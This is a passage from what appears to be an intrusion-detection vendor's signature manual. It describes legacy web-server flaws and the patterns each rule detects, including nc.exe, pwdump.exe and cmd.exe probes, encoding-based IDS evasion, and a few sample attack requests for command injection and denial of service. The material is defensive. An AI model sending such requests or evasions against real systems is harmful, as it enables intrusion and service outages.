schemes and UTF-16 is one of them. UTF-16 encodes each Unicode character using either one or two 16-bit words (i.e.
two or four bytes), depending on the code point of the character. Unicode assigns each character a code point between
U+000000 and U+10FFFF. Depending upon the language and Unicode page, different codes can mean different
64
characters. Such complexity has led to some IDS evasion techniques also. Therefore it is of paramount importance to
decode UTF-16 characters correctly. The rule triggers if it finds encoding, which is not strictly following, standard.
Such HTTP requests may be indicative of some malicious activities.
Signature ID: 370
Null Bytes in HTTP Request vulnerability
Industry ID: CVE-2000-0671 Bugtraq: 1510,3810 Nessus: 10479,10837
Signature Description: According to HTTP RFC, no NULL byte should be present in the URI. However, many server
happen to ignore NULL byte and process the request. An attacker, by taking advantage, can send Null bytes (encoded
or not) in HTTP request so that if any c function is being used by the IDS/IPS device, he/she can avoid matching as
most of the c functions take NULL byte as 'end of string'. In this way, the pattern may not be matched. This rule hits
when system detects any such attempt in HTTP request.
Signature ID: 371
URI Invalid UTF-8 Coding vulnerability
Signature Description: HTTP(HyperText Transfer Protocol) is a protocol used by the World Wide Web. It is used for
transferring files(text, graphic, images, sound, video, and other multimedia files) on the World Wide Web. HTTP web
servers are enabled with unicode encoding and decoding. They support UTF-8 and UTF-16 encoding sstyle. There are
reports on the misuse of UTF encoding to launch various attacks. This rule hits when an invalid UTF-8 uni-coding
detected in HTTP request.
Signature ID: 372
Unknown Unicode Mapping in HTTP Request vulnerability
Signature Description: HTTP web servers are enabled with unicode encoding and decoding. Eah unicode is mapped to
a specific character and therefore, depending on the region, a suitable unicode page is used. There are reports on the
misuse of unicode encoding to launch various attacks. This signature detects the unknown Unicode Mapping in HTTP
request.
Signature ID: 373
Null Character in HTTP Version String vulnerability
Signature Description: This is an anti IIPS evasion technique. Many C string libraries use the NULL character to
denote the end of the string. Many ID/IP systems use these libraries (they are typically too slow for these high-speed
applications), without realizing the outcome of NULL as string terminator. Attacker can use this to her advantage with
the following type of request: GET /cgi-bin/some.cgi HTTP\0/1.0. This type of behavior can fool an IDS/IPS, because
IDS/IPS will not be able to parse the URI properly.
Signature ID: 374
FastCGI Echo.exe Cross Site Scripting vulnerability
Nessus: 10838
Signature Description: FastCGI is an open extension to CGI that provides high performance without the limitations of
server specific APIs, and is included in the default installation of the Oracle9i Application Server. Various other web
servers support the FastCGI extensions. Two sample CGI's are installed with FastCGI(echo.exe and echo2.exe under
Windows). Both of these CGI's output a list of environment variables and path information for various applications.
65
FastCGI is vulnerable to a cross site scripting. This rule generates an event when an attacker sent fcgi-bin/echo.exe
pattern to the http server.
Signature ID: 375
FastCGI Echo2.exe Cross Site Scripting vulnerability
Nessus: 10838
Signature Description: FastCGI is an open extension to CGI that provides high performance without the limitations of
server specific APIs, and is included in the default installation of the Oracle9i Application Server. Various other web
servers support the FastCGI extensions. Two sample CGI's are installed with FastCGI(echo.exe and echo2.exe under
Windows). Both of these CGI's output a list of environment variables and path information for various applications.
FastCGI is vulnerable to a cross site scripting. This rule generates an event when an attacker sent echo2.exe? pattern to
the http server.
Signature ID: 376
Apache Remote Command Execution via .bat files vulnerability
Signature Description: The Apache HTTP Server is a freely available web server that runs on a variety of operating
systems including Unix, Linux, and Microsoft Windows. Apache supports the Common Gateway Interface (CGI) that
defines a standard interface between the HTTP server and external applications. Apache HTTP Server 1.3.9 is
vulnerable. If a remote attacker sends a request for a .bat or .cmd DOS batch file appended with the pipe character "|"
followed by arbitrary commands, the attacker could use the cmd.exe shell interpreter to execute arbitrary commands on
the vulnerable system. This vulnerability is fixed in 1.3.24 version. Administrators are advised to update 1.3.24 or later
version to resolve this vulnerability.
Signature ID: 377
Nethief Virus/Trojan vulnerability
Signature Description: Trojan horses are malicious program which usually hacker used to bind it with some other
application or process like, Greeting cards or Games etc.When the user opens or triggers, then the malicious program
will sit in the users computer and tries to open a backdoor silently and give a way to an attacker to take full control of
the user and can exploit the user. This trojan copies itself with the name IEXPLORER.EXE (the real one is
IEXPLORE.EXE), and seems to be using it as the USER-AGENT. The trojan (apparently) targets only Win32
operating system.
Signature ID: 378
Directory.php Shell Command Execution Vulnerability
Signature Description: The directory.php script provides a web interface for directory listings, similar to the 'ls'
command. Xenakis directory.php is vulnerable to shell command execution. This vulnerability is due to insufficient
sanitization of user supplied meta characters such as ";" or "|" in the script's input. No remedy is available as of
September 13, 2008.
Signature ID: 379
Php POST file uploads vulnerability
66
Signature Description: PHP is a widely used general purpose scripting language that is especially suited for Web
development and can be embedded into html. PHP(4.1.0, 4.1.1, 4.0.6) and earlier versions are vulnerable to a heap
based buffer overflow. This vulnerability is due to insufficient sanitization of user supplied data. A successful
exploitation of this vulnerability allow an attacker to execute arbitrary commands on the vulnerable system. This
vulnerability is fixed in 4.1.2 version. Administrators are advised to update 4.1.2 version or later version to resolve this
issue.
Signature ID: 380
Php POST file uploads vulnerable
Signature Description: PHP is a widely used general purpose scripting language that is especially suited for Web
development and can be embedded into html. PHP 3.0.x and earlier versions are vulnerable to a heap based buffer
overflow. This vulnerability is due to insufficient sanitization of user supplied data. A successful exploitation of this
vulnerability allow an attacker to execute arbitrary commands on the vulnerable system. This vulnerability is fixed in
4.1.2 version. Administrators are advised to update 4.1.2 version or later version to resolve this issue.
Signature ID: 381
Access to Vulnerable Cart32 CGI vulnerable
Signature Description: Cart32 is shopping cart software built for Microsoft Servers using Visual Basic, a MySQL
database, and html components. Cart32 provides shopping cart, checkout, and storefront hosting facilities to tens of
thousands of online retail clients internationally. Cart32 3.0 is vulnerable to a reconnaissance. A successful exploitation
of this vulnerability will allow an attacker to obtain username, password, credit card numbers, and other crucial details.
No remedy is available.
Signature ID: 383
Access to Vulnerable Dansie Shopping Cart CGI
Signature Description: The Dansie Shopping Cart, is an e-commerce solution. Dansie Shopping Cart 3.04 is
vulnerable. The vulnerable Dansie Shopping Cart allows remote users to modify shopping cart contents by requesting a
certain url with altered variables. This signature specifically detects "cart.pl" pattern in the traffic sent to the http server.
Signature ID: 385
IIS Sample File cmd.exe vulnerability
Industry ID: CVE-2000-0540 Bugtraq: 1386 Nessus: 11003,10444,10996
Signature Description: Microsoft IIS(Internet Information Server) is a group of Internet servers including Hypertext
Transfer Protocol service and a File Transfer Protocol service. It was developed by Microsoft. This signature detects an
attempt made to exploit potential weaknesses in a host running Microsoft IIS. A successful exploitation of this
vulnerability allows an attacker to access sensitive information on the vulnerable system. This signature specifically
detects "cmd.exe" pattern in the traffic sent to the http server.
Signature ID: 386
IIS Sample File root.exe vulnerability
67
detects "shell.exe" pattern in the traffic sent to the http server. This signature detects access to root.exe.
Signature ID: 387
IIS Sample File bin.exe vulnerability
Industry ID: CVE-2000-0539 CVE-2000-0540 Bugtraq: 1386 Nessus: 11003,10444,10996
detects "shell.exe" pattern in the traffic sent to the http server. This signature detects access to bin.exe.
Signature ID: 388
IIS Sample File shell.exe vulnerability
detects "shell.exe" pattern in the traffic sent to the http server. This signature detects access to shell.exe.
Signature ID: 389
IIS Sample File hack.exe vulnerability
Industry ID: CVE-2000-0539 CVE-2000-0540 Bugtraq: 1386 Nessus: 11003,10444,10996
detects "hack.exe" pattern in the traffic sent to the http server.
Signature ID: 390
IIS Sample File nc.exe vulnerability
detects "nc.exe" pattern in the traffic sent to the http server.
68
Signature ID: 391
IIS Sample File ncx.exe vulnerability
Nessus: 11003
detects "ncx.exe" pattern in the traffic sent to the http server.
Signature ID: 392
IIS Sample File netcat.exe vulnerability
detects "netcat.exe" pattern in the traffic sent to the http server.
Signature ID: 393
IIS Sample File FireDaemon.exe vulnerability
Nessus: 11003
detects "FireDaemon.exe" pattern in the traffic sent to the http server.
Signature ID: 394
IIS Sample File Fire.exe vulnerability
Nessus: 11003
detects "Fire.exe" pattern in the traffic sent to the http server.
Signature ID: 395
IIS Sample File FireD.exe vulnerability
Nessus: 11003
detects "FireD.exe" pattern in the traffic sent to the http server.
69
Signature ID: 396
IIS Sample File ftp.exe vulnerability
Nessus: 11003
detects "ftp.exe" pattern in the traffic sent to the http server.
Signature ID: 397
IIS Sample File ftpx.exe vulnerability
Nessus: 11003
detects "ftpx.exe" pattern in the traffic sent to the http server.
Signature ID: 398
IIS Sample File pwdump.exe vulnerability
Nessus: 11003
detects "pwdump.exe" pattern in the traffic sent to the http server.
Signature ID: 399
IIS Sample File pwdump2.exe vulnerability
Nessus: 11003
detects "pwdump2.exe" pattern in the traffic sent to the http server.
Signature ID: 400
IIS Sample File pwdump3.exe vulnerability
Nessus: 11003
70
detects "pwdump3.exe" pattern in the traffic sent to the http server.
Signature ID: 401
Apache Web Server Chunked Transfer Encoding Buffer Overflow Vulnerability
Signature Description: Apache is a web server that includes support for chunked transfer encoding according to the
HTTP 1.1 standard. By chunked transfer encoding a sender can split the message body into chunks of arbitrary length,
and send them separately. Apache HTTP Server versions 1.2.2 and later, 1.3 up to and including 1.3.24, and 2.0 up to
and including 2.0.36 are vulnerable to a heap buffer overflow vulnerability in the handling of certain chunk-encoded
HTTP requests. By constructing a crafted HTTP request packet with chunk length greater than 0x7fffffff and sending it
to a vulnerable Apache server may crash the server or allow execution of arbitrary code. Upgrade to the latest version
of Apache HTTP Server. Several OS that use Apache server are also vulnerable. Their respective vendors has given a
patch for this issue.
Signature ID: 402
Chunked encoding Handling Vulnerability
Industry ID: CVE-2002-0079 CVE-2002-0071 CVE-2002-0392 Bugtraq: 4485,4474,5033 Nessus:
11030,10935,10932,10943,12305
Signature Description: Chunked Transfer Encoding is one of many ways in which an HTTP server may transmit data
to it's clients. Normally, data delivered in HTTP responses is sent in one piece, whose length is indicated by the
Content-Length header field. The length of the data is important, because the client needs to know where the response
ends and any following response starts. With chunked encoding however, the data is broken up into a series of blocks
of data and transmitted in one or more 'chunks' so that a server may start sending data before it knows the final size of
the content that it's sending. IIS is a set of Internet-based services produced by Microsoft for servers using Microsoft
Windows. The Apache HTTP Server is a web server developed and maintained by an open community of developers
under the auspices of the Apache Software Foundation. Apache Web Server versions 1.2.x to 2.0.36(inclusive) contain
a flaw that allows a remote attacker to execute arbitrary code. The issue is due to the mechanism that calculates the size
of "chunked" encoding not properly interpreting the buffer size of data being transferred. By sending a specially crafted
chunk of data, an attacker can possibly execute arbitrary code or crash the server. Microsoft Internet Information Server
(IIS) versions 4.0 and 5.0 are vulnerable to the heap based buffer overflow. If the function that enables the chunked
encoding data transfer mechanism, which is part of the ISAPI (Internet Services Application Programming Interface)
extension that implements Active Server Pages (ASP). By sending a specially-crafted chunk of data that causes the
incorrect buffer size to be allocated, a remote attacker could overflow a buffer and execute arbitrary code on the system
or cause the IIS service to fail.
Signature ID: 403
BugZilla DoEditVotes.CGI Login Error Information Leak Vulnerability
Signature Description: Bugzilla is a bug-tracking database program developed by Mozilla for reporting and assigning
bugs. A vulnerability in the doeditvotes.cgi script in Bugzilla versions 2.14 and earlier could allow a remote attacker to
obtain sensitive information. Sensitive information is disclosed to the user when a bad login to doeditvotes.cgi occurs,
which may be potentially used for malicious purposes.
71
Signature ID: 404
Microsoft IIS HTR ISAPI Extension Buffer Overflow Vulnerability
Signature Description: HTR is a server-side scripting technology for IIS which has largely been supplanted by ASP.
Buffer overflow in the ism.dll ISAPI extension that implements HTR scripting in Internet Information Server (IIS) 4.0
and 5.0 allows attackers to cause a denial of service or execute arbitrary code via HTR requests with long variable
names, which permits the attacker to access with the privileges of the IWAM_computername account.
Signature ID: 409
Microsoft IIS Front Page Server Extension DoS Vulnerability
Signature Description: Microsoft IIS ships with Front Page Server Extensions (FPSE) which enables administrators
remote and local web page and content management. Browse-time support is another feature within FPSE which
provides users with functional web applications. It is vulnerable to remote denial of service attack usually called the
'malformed web submission' vulnerability. By supplying malformed data to one of the FPSE functions IIS will stop
responding. A restart of the service is required in order to gain normal functionality.
Signature ID: 410
AnalogX Web server Denial of Service Vulnerability
Signature Description: AnalogX SimpleServer:WWW is designed to be a simple web server for use with Microsoft
Windows operating environments. A remote attacker is able to connect to SimpleServer via telnet and makes an invalid
request to the server. Making a request consisting of about 640 '\x40' characters will cause the web server to crash. This
condition will cause the web server to crash and potentially lead to a buffer overflow condition. The vulnerable version
is AnalogX SimpleServer:WWW 1.16.0.
Signature ID: 412
Xylogics Annex Terminal Server DoS vulnerability
Signature Description: Bay Networks has high-performance to streamline dial-up traffic for reliable transport over both
the public network and the Internet. For dial access, it is a multi-protocol support allows service providers to use one or
more industry-standard network protocols. Along with its full array of digital and analog remote access options. There
have been found serveral DoS attacks agaisnt Annex terminal servers from xylogics(bay). The vulnerability lies in the
ping CGI interface on the built-in Web server within the Xylogics Annex terminal servers, which does not validate user
input properly. It is possible to crash the remote Annex terminal by connecting to the HTTP port, and requesting the
'/ping' cgi with a too long argument (at least 64 characters). The vulnerable platform is Xylogics Annex Terminal
Server.
Signature ID: 413
CISCO Switch View-source DoS Vulnerability
Nessus: 10682
Signature Description: Cisco switches have web interface to manage device remotely. Few versions of switches suffer
from a DoS vulnerability. By sending an HTTP request with URI, "http://switch-server/cgi-bin/view-source?/" the
72
switch crashes and performs a software to re-load and network connectivity is disrupted. By repeatly sending such
HTTP requests, a denial of service attack can be performed against the switch and the entire network connected to
it.Cisco Internetwork Operating System Software IOS (tm), C2900XL Software (C2900XL-H2S-M), Version
12.0(5.1)XP is vulnerable platform.
Signature ID: 414
Cisco 675 DSL Router DoS Vulnerability
Signature Description: Cisco Broadband Operating System is the operating system for Cisco 600 series routers.The
Cisco 600 series routerd are small office/home office (SOHO)/telecommuter DSL routers. The Web interface to Cisco
600 series routers running CBOS 2.4.1 and earlier allow remote attackers to cause a denial of service via a URL that
does not end in a space character. It is possible to lock the remote server by doing the request : GET ? \r\n\r\n. The
administrator needs to reboot it to make it work again. A cracker may use this flaw to crash this host, thus preventing
your network from working properly.
Signature ID: 415
Domino HTTP Denial of Service by sending long URL vulnerability
Signature Description: Lotus Domino HTTP server can be used as a traditional Web server, with static html documents
and cgi-bin scripts handling. These features are turned on by default, and use /cgi-bin virtual path, mapped to
<NOTESDATA>\domino\cgi-bin directory.It contains a flaw that may allow a remote denial of service. The issue is
triggered when a very long URL is called in the /cgi-bin directory for a non-existent page, and will result in loss of
availability for the platform. Lotus Domino Server 4.6 .x, Microsoft Windows NT 4.0 are vulnerable platform.
Signature ID: 416
Eicon DivaLAN ISDN modem DoS vulnerability
Signature Description: Eicon Technology Corporation sells a variety of products that provide connectivity. One of
these products is an ISDN modem (called DIVA ISDN modem). This modem was found to be vulnerable to a remote
Denial of Service attack, which renders it useless (when it is attacked) until a hard reset is done to the device. With the
default configuration, only users from the local network can perform this attack. This vulnerability has been fixed by
the vendor and a new firmware is available. This attack will send the GET request with the uri
/login.htm?password=AA[....]AAA This A will Repeats 200 times. Diva LAN ISDN Modem 1.0 release 2.5 is affected
by this vulnerability.
Signature ID: 417
SalesLogix Eviewer WebApplication admin access vulnerability
Signature Description: The SalesLogix eViewer is Web-based application that provides a Web interface for use with
SalesLogix data. eViewer will not perform authorization on administrative commands if they are requested directly in
the URL. As an example, it is possible to crash the remote server by requesting, GET
/scripts/slxweb.dll/admin?command=shutdown, A hacker may use this flaw to issue admin commands without any
authentication. SalesLogix Corporation eViewer 1.0 is vulnerable to this issue.
73
Signature ID: 418
Microsoft FrontPage/IIS shtml.dll Denial Of Service Vulnerability
Signature Description: Microsoft FrontPage Server Extensions let users manage their web site remotely. FrontPage
2000 Server Extensions is vulnerable to a remote denial of service attack. By requesting a URL using the shtml.exe
component of FrontPage 2000 Server Extensions, an attacker can overflow a buffer and also determine the physical
path of the server components by including a DOS device name in the GET request. This Attacker First send the Get
request with uri containing /_vti_bin/shtml.exe. Once server responds, again it will send /_vti_bin/shtml.exe/aux.htm
after that once again it will send /_vti_bin/shtml.exe, if server is not responding it will be treated as attack. As a result,
FrontPage operations slow down and the server shows 100 percent CPU utilization until the GET request times out.
Signature ID: 419
Novell GroupWise buffer overflow vulnerability
Signature Description: Novell GroupWise is a cross-platform collaboration and messaging system. Novell GroupWise
5.5 with Enhancement Pack installed is vulnerable to a denial of service attack. The Denial of Service attack occurs
when a large character string is sent by a browser and is processed by the servlet gateway, causing the server to abend,
CPU usage to increase to 100%, or the post office service to crash. The server will require a reboot to recover from the
attack. Novell Groupwise Enhancement Pack 5.5 is vulnerable.
Signature ID: 421
IIS 5.0 PROPFIND DoS Vulnerability
Industry ID: CVE-2001-0151 CVE-2001-0508 Bugtraq: 2453,2690,2483 Nessus: 10667,10631,10732
Signature Description: WebDAV is an extension to the HTTP protocol that allows remote authoring and management
of web content. In the Windows 2000 implementation of the protocol, IIS 5.0 performs initial processing of all
WebDAV requests, then forwards the appropriate commands to the WebDAV process. It is possible to disable the
remote IIS server by making a variation of a specially formed PROPFIND request. WebDAV contains a flaw in the
handling of certain malformed requests, submitting multiple malformed WebDAV requests could cause the server to
stop responding. The successful attack should cause a DoS. Microsoft IIS 5.0 is vulnerable.
Signature ID: 422
AVM Ken! Proxy DoS vulnerability
Signature Description: AVM Ken! is a proxy server for Windows that allows multiple users to share an ISDN
connection. A local attacker could cause a denial of service by sending random characters to port 3128. This attack
causes the software to crash and close all connections to the server. AVM Ken! prior to 1.04.32 are affected by this
issue.
Signature ID: 423
Netscape Enterprise Server SSL Buffer Overflow DoS Vulnerability
Communications Corporation. Netscape Enterprise Server versions 3.0, 3.51, and 3.6 are vulnerable to a denial of
74
service attack. It suffers from a buffer overflow error in the SSL handshaking code that causes it to crash when the
buffer is overrun.
Signature ID: 424
Nortel Contivity HTTP Server DoS vulnerability
Signature Description: Nortel Contivity series network devices (extranet switches) ships with an httpd (to provide an
interface for remote administration) which runs on top of VxWorks.The cgiproc CGI script in Nortel Contivity HTTP
server allows remote attackers to cause a denial of service via a malformed URL that includes shell metacharacters. If
metacharacters such as "!", or "$" are passed to cgiproc, the system will crash (because the characters are not escaped).
Signature ID: 425
Oracle Web Server 2.1 DoS vulnerability
Signature Description: Oracle Web Server version 2.1 is vulnerable to a denial of service attack. It is possible to make
the remote web server crash by supplying a long argument to the cgi /ews-bin/fnord. An attacker may use this flaw to
prevent access to web site.
Signature ID: 426
Real Networks RealServer View-Source DoS Vulnerability
Signature Description: RealNetworks RealServer Helix Server is the only multi-format, cross platform streaming
server for delivering the highest quality experience to wired and wireless devices. It is vulnerable to a denial of service.
A remote attacker can crash the RealServer 7.0 by sending a request for a file with no specified variable set, making it
necessary to restart the server, the attacker sends the GET request with the uri /viewsource/template.html? to Real
Server.The vulnerability can be recreated by sending certain information to the RealServer HTTP default TCP port
8080, where after the service processes this information it will stop responding. The vulnerable platforms are Real
Networks Real Server 7.0.0, 7.0.1 and 8.0.0Beta.
Signature ID: 427
Xylogics/Bay Annex Ping CGI Overflow vulnerability
Industry ID: CVE-CVE-1999-1070
Signature Description: Bay Networks, a Nortel Networks subsidiary, acquired and supports a terminal server solution
from Xylogics called an Annex server. Annex servers allow remote users to obtain dialup connections to a network,
they also potentially allow network clients to dial out of the network, and are thus coveted targets for attackers. Some
versions of the Annex software are susceptible to a denial of service attack involving the server's built-in web server.
Vulnerable Annex versions support a "ping" CGI program which, when fed overly-long queries, overflows an internal
buffer and disables the entire access server.
Signature ID: 428
ETL Delegate Buffer Overflow Vulnerability
Signature Description: DeleGate is a multi-purpose application level gateway, or a proxy server which runs on multiple
platforms (Unix, Windows, MacOS X and OS/2.Delegate is a versatile application-level proxy and it is written in a
75
very insecure style. The attacker can execute arbitrary code on the delegate server through the delegate port(s), or
malicious servers which a user accesses using the delegate proxy. This code will run as the user ID of the 'delegated'
process, the unchecked buffers that could be exploited to remotely compromise the server. E.g. whois://a b 1
AAAA..AAAAA. This problem may allow an attacker to gain a shell on this computer and can able to mount a local
attack to further upgrade the access privileges.
Signature ID: 429
IIS Fronpage fp30reg.ll Chunked Overflow vulnerability
Signature Description: Microsoft FrontPage is a HTML editor and web site administration tool from Microsoft for
Windows. Front Page Server Extensions allows Microsoft FrontPage clients to communicate with web servers, and
provide additional functionality intended for websites. Microsoft FrontPage Server Extensions (FPSE) for Windows
NT and Windows 2000 is vulnerable to a buffer overflow in the Visual Studio RAD (Remote Application Deployment)
Support sub-component. FrontPage Server Extensions are used in Microsoft Internet Information Server (IIS) versions
4.0 and 5.0. The DLL fp30reg.dll in FPSE when receives a URL request that is longer than 258 bytes and TransferEncoding header contains chunked data, a stack based buffer overflow will occur. An attacker could exploit this
vulnerability to execute arbitrary code on the system and possibly gain complete control over the affected Web server.
Apply the appropriate patch for your system, as listed in Microsoft Security Bulletin MS03-051.
Signature ID: 431
Microsoft Index Server and Indexing Service ISAPI Extension Buffer Overflow Vulnerability
Signature Description: Mirossoft Internet Information Services (IIS) is a web server application for Windows platform.
A remotely exploitable buffer overflow vulnerability exists in the ISAPI (Indexing Service Application Programming
Interface) extension (IDQ.DLL) installed with most versions of IIS 4.0 and 5.0. As part of installation process, IIS
installs IDQ.DLL though it is a component of Index Server (known in Windows 2000 as Indexing Service) and
provides support for administrative scripts (.ida files) and Internet Data Queries (.idq files). The vulnerability results
because idq.dll contains an unchecked buffer in a section of code that handles input URLs. The buffer overrun occurs
before any indexing functionality is requested. As a result, even though idq.dll is a component of Index Server/Indexing
Service, the service would not need to be running in order for an attacker to exploit the vulnerability. Remote attackers
can exploit this vulnerability to gain complete control of an affected server by sending a specially crafted request for
.ida or .idq files. Successful exploitation results in execution of arbitrary code on the victim machine with SYSTEM
privileges. "Code Red" and "Code Red II" worms actively exploited this vulnerability.
Signature ID: 432
Oracle Application Server Shared Library Buffer Overflow Vulnerability
Industry ID: CVE-CVE-2001-0419 Bugtraq: 2569 Nessus: 10654
Signature Description: An exploitable buffer overflow exists in a shared library which is being shipped with Oracle
Application Server 4.0.8.2, and used by iPlanet Web Server if it is configured as external web-listener. Overflow
happens when a long string is requested with prefix that has been 'linked' to OAS (by default it is /jsp/). which is then
passed to the library routines to be processed. Buffer size is around 2050-60 bytes.
Signature ID: 433
OpenLink 3.2 Web Config Buffer Overflow Vulnerability
76
Signature Description: OpenLink is an open source and commercial middleware software. Both the Unix and
WindowsNT versions of OpenLink 3.2 are vulnerable to a remotely exploitable buffer overflow attack. The problem is
in their web configuration utility, and is the result of an unchecked strcpy() call. The consequence is the execution of
arbitrary code on the target host (running the configuration utility) with the priviliges of the web software by sending
one of these two URLs GET AAA[....]AAA or GET /cgi-bin/testcono?AAAAA[...]AAA HTTP/1.0. The rule detects an
malicious attempt of second type.
Signature ID: 437
IIS ASP Chunked Encoding Heap Buffer Overflow Vulnerability
Signature Description: A heap overflow condition in the 'chunked encoding transfer mechanism' related to Active
Server Pages has been reported for Microsoft IIS, versions 4.0 and 5.0. Exploitation of this vulnerability may result in a
denial of service or allow for a remote attacker to execute arbitrary instructions on the victim host. Microsoft IIS 5.0 is
reported to ship with a default script (iisstart.asp) which may be sufficient for a remote attacker to exploit. Other
sample scripts may also be exploitable.
Signature ID: 438
IPlanet Webserver .shtml Buffer Overflow Vulnerability
Signature Description: IPlanet Webserver is an http server product by the Sun-Netscape Alliance. By sending a
specially crafted HTTP request of approximately 198 - 240 characters with .shtml (default) file extension, it is possible
to cause a buffer overflow and allow the execution of arbitrary code. This is due to the way iPlanet parses .shtml files.
This vulnerability is only known to be exploitable if the server side 'parsing' option is enabled. An attacker may use this
flaw to gain a shell on this host.iPlanet E-Commerce Solutions iPlanet Web Server 4.0 is vulnerable
Signature ID: 439
Squid Cache FTP Proxy URL Buffer Overflow Vulnerability
Signature Description: Squid is a free proxy server. A buffer overflow exists in the Squid proxy server's FTP URL
handling. If a user has the ability to use the Squid process to proxy FTP requests, it may be possible for the user make a
malicious request. By sending a custom-crafted ftp:// URL through the squid proxy, it is possible to crash the server,
requiring manual restart to resume normal operation. This rule detects such attempt of buffer overflow.
Signature ID: 442
DCShop exposes sensitive files - orders.txt file access vulnerability
Signature Description: DCShop is a CGI-based ecommerce system from DCScripts. DCShop beta version 1.002 found
does not properly protect user and credit card information. This rule triggers if request is made to access orders.txt
present in dcshop/orders directory which includes all recent orders, including the end-users name, shipping and billingaddress, e-mail address and CREDIT CARD NUMBERS with exp-dates in plain text format.
Signature ID: 443
DCForum DCShop File Disclosure Vulnerability
77
Signature Description: DCShop is a CGI-based ecommerce system from DCScripts. DCShop beta version 1.002 found
does not properly protect user and credit card information. This rule triggers if request is made to access
auth_user_file.txt present in dcshop/auth_data directory which contains administrator name and password in plain text
format.
Signature ID: 444
Double Nibble Encoding vulnerability
Signature Description: Double nibble hex encoding is based on the standard hex encoding method. Each hexadecimal
nibble value is encoded using the standard hex encoding. For example, to encode a capital A, the encoding would be
%%34%31.The normal hex encoding for A is %41.So, the first nibble, 4, is encoded as %34 (the ASCII value for the
numeral 4), and the second nibble, 1, is encoded as %31 (the ASCII value for the numeral 1).
Signature ID: 445
Double Percent Hex encoding vulnerability
Signature Description: Double percent hex encoding is based on the normal method of hex encoding. The percent is
encoded using hex encoding followed by the hexadecimal byte value to be encoded. To encode a capital A, the
encoding is %2541.As can be seen, the percent is encoded with the %25 (this equals a '%'). The value is then decoded
again with the value this time being %41 (this equals the 'A').This encoding is supported by Microsoft IIS. NOTE:
Even though some administrator use double percentage encoding in the URL, these are not widely used. Also this is
considered as a well known evasion technique. Please ignore this log if the double percentage encoding is purposefully
Signature ID: 446
IIS %u Unicode wide character encoding vulnerability
Signature Description: Microsoft Internet Information Server (IIS) allows wide characters to be Unicode encoded in
URL requests in a format that uses "%u". Such encoded characters appear as "%uXXXX", where "XXXX" represents
hexadecimal characters (0-9, A-F). For example, the character 'b' can be encoded as "%u0062". A remote attacker can
use this form of encoding to attempt to bypass intrusion detection systems(IDS)/intrusion prevention
systems(IPS).Many public ".ida" overflow exploits (including the CodeRed worms) use this type of encoding when
executing a buffer overflow attempt.
Signature ID: 524
DHCP server info gathering
Nessus: 10663
Signature Description: Dynamic Host Configuration Protocol (DHCP) is a protocol used by networked devices
(clients) to obtain the parameters necessary for operation in an Internet Protocol network. This protocol reduces system
administration workload, allowing devices to be added to the network with little or no manual configuration. Some
DHCP server provide sensitive information such as the NIS domain name, or network layout information such as the
list of the network www servers, and so on. Using such information, an attacker may focus his future attacks on the
network. DHCP server should not be available to an external network.
Signature ID: 525
Microsoft Exchange Public Folders Information Leak vulnerability
Nessus: 10755
78
Signature Description: Public folders are a part of the Microsoft Exchange information store that anyone can access.
The public folders are usually set up so that everyone has read access, but only one or two people have the authority to
add, remove, or change folder content. Microsoft Exchange Public Folders can be set to allow anonymous
connections(set by default). While administrator may disable the "Find Users" features, an attacker can use this
vulnerability to gain critical information about the users(such as full email address, phone numbers, etc).
Signature ID: 526
Matt Wright FormMail Remote Command Execution Vulnerability
Signature Description: FormMail is a generic HTML form to e-mail gateway that parses the results of any form and
sends them to the specified users. This rule triggered when an attacker can create a web page which references a
FormMail script on a remote host, once the user click the link. An attacker can gain access and execute arbitrary
commands on the victim's server and send anonymous email by modifying the recipient and message parameters. The
affected version of FormMail is 1.6 and earlier. The issue is fixed in the version of FormMail(1.6 or later). Update this
version for removing this issue, which is available at vendor's web site.
Signature ID: 528
FormMail.cgi Information Disclosure Vulnerability
Bugtraq: 1187
Signature Description: Matt Wright Form-mail is a CGI utility script in Perl that provides form authors with a simple
mechanism to create and send both simple Email items and more complex Email. The Affected versions of Matt
Wright FormMail are 1.6, 1.7, and 1.8. This rule will triggers when a remote attacker could send specially-crafted
HTTP request to the formmail.cgi script, an attacker can use this vulnerability to obtain sensitive information. This
issue is fixed in Matt Wright Formmail 1.9.
Signature ID: 551
Shopping Cart Arbitrary Command Execution vulnerability
Signature Description: Hassan Consulting's Shopping Cart is commercial web store software. The Shopping Cart
allows your website to track visitors as they pass from page to page, keeping track of items clicked on and information
sent by the user. When the user exits, totals can be calculated and orders/data can be sent. Shopping Cart(Hassan
Consulting Shopping Cart version 1.23) does not filter certain types of user-supplied input from web request. A remote
attacker could send a specially-crafted URL request to the shop.pl script containing shell metacharacters in the page
parameter, an attacker can use this vulnerability to execute arbitrary commands on the server. No remedy available as
of September, 2008.
Signature ID: 552
Web Server robots.txt Information Disclosure Vulnerability
Nessus: 10302
Signature Description: The robot.txt file is commonly placed in the root directory of a system's web server to control
the actions of web robots(Robots are programs that traverse many pages in the World Wide Web by recursively
retrieving linked pages). This rule will triggers when an attacker could requesting the '/robots.txt' file, an attacker can
use this vulnerability to retrieve sensitive information and directories on the affected site.
79
Signature ID: 557
WhatsUp Gold Default Admin Account vulnerability
Industry ID: CVE-1999-0508 CVE-1999-0508 Nessus: 11004,10747
Signature Description: WhatsUp Gold is an easy-to-use tool for monitoring TCP/IP, NetBIOS, and IPX networks.
whatsUp Gold initiates both visible and audible alarms when monitored devices and system services go down.
WhatsUp Gold provides a web interface so you can view network status from a web browser on any computer on the
Internet. And it has default password for the admin user account. An attacker can use this vulnerability to probe other
systems on the network and obtain sensitive information.
Signature ID: 558
Linksys Router Default Password vulnerability
Signature Description: Linksys is a leader in VoIP, Wireless routers and Ethernet networking for home, SOHO and
small business users. It provide effortless and economical sharing of broadband Internet connections, files, printers,
digital music, videos, photos and gaming over a wired or wireless network. By default, Linksys routers install with a
default password. The administrative account has a password 'admin' which is publicly known and documented. An
attacker can use this vulnerability to reconfigure the router and trivially access the program or system.
Signature ID: 559
40X HTML Cross Site Scripting vulnerability
Nessus: 10643
Signature Description: Cross-site scripting is a type of computer security vulnerability typically found in web
applications which allow code injection by malicious web users into the web pages viewed by other users. An exploited
cross-site scripting vulnerability can be used by attackers to bypass access controls such as the same origin policy. This
signature generates an event when an attacker try to exploit web applications by using
"info('Can%20Cross%20Site%20Attack')" pattern.
Signature ID: 560
Apache /server-info accessible Vulnerability
Nessus: 10678
Signature Description: Apache is an open source Web server that is distributed free. It runs on Unix, Linux, Solairs and
Windows operating systems. This rule triggered when an attacker could requesting the URL '/server-info'. The
successful exploitation can allow an attacker to disclose information about its configuration such as installed modules,
